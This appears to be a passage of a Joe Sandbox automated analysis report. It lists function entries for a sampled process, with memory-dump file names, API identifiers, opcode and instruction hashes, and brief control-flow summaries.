                                  Function 007300C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                  • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                  • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                  • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409AA0 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                  • Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
                                  • Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
                                  • Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 11 41a5f0-41a621 call 41af20 RtlAllocateHeap
                                  APIs
                                  • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: &EA
                                  • API String ID: 1279760036-1330915590
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040830C Relevance: 1.6, APIs: 1, Instructions: 57threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 209 40830c-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 218 40835c-40836e PostThreadMessageW 209->218 219 40838e-408392 209->219 220 408370-40838a call 40a470 218->220 221 40838d 218->221 220->221 221->219
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 2b1ced85cfafdd5732d96565cd9edafc066557c860400f298315d795c27a5101
                                  • Instruction ID: 05aaebecf39ec013da95658d58dee1c039a2fd93af06260385d1554cbd482746
                                  • Opcode Fuzzy Hash: 2b1ced85cfafdd5732d96565cd9edafc066557c860400f298315d795c27a5101
                                  • Instruction Fuzzy Hash: EC01D471A8032877E720A6958C03FFE772C6B40B54F05012AFF04BA1C1E6A8690642EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 224 408310-40831f 225 408328-40835a call 41c9c0 call 40ace0 call 414e40 224->225 226 408323 call 41be20 224->226 233 40835c-40836e PostThreadMessageW 225->233 234 40838e-408392 225->234 226->225 235 408370-40838a call 40a470 233->235 236 40838d 233->236 235->236 236->234
                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_oktuxvhtsq.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 2b8d0fafe82a707928844ec316f7e0105081546aa8e26e9dc354d60cbf214f5e
                                  • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                  • Opcode Fuzzy Hash: 2b8d0fafe82a707928844ec316f7e0105081546aa8e26e9dc354d60cbf214f5e
